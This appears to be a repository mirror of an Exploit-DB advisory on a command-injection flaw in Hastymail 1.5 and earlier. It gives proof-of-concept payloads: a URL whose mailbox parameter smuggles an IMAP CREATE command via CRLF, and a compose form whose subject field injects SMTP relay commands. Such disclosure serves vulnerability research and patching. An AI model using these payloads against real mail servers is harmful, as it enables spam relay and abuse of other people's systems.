bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/28777.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

27 lines
No EOL
1 KiB
Text
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/20424/info
Hastymail is prone to an IMAP / SMTP command-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
An authenticated malicious user could execute arbitrary IMAP / SMTP commands on the affected mail server processes. This may allow the user to send SPAM from the server or to exploit latent vulnerabilities in the underlying system.
Hastymail 1.5 and prior versions are affected.
This example sends the CREATE IMAP commands to the vulnerable parameter:
http://www.example.com/<path_to_hastymail>/html/mailbox.php?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX%2522%0d%0aA0003%20CREATE
%2522INBOX.vad
The SMTP POST relay example from nonexistant email address is available:
POST http://www.example.com/<path_to_hastymail>/html/compose.php HTTP/1.1
to include:
Content-Disposition: form-data; name="subject"
Proof of Concept
.
mail from: hacker@domain.com
rcpt to: victim@otherdomain.com
data
This is a proof of concept of the SMTP command injection in Hastymail
.
Reference in a new issue View git blame Copy permalink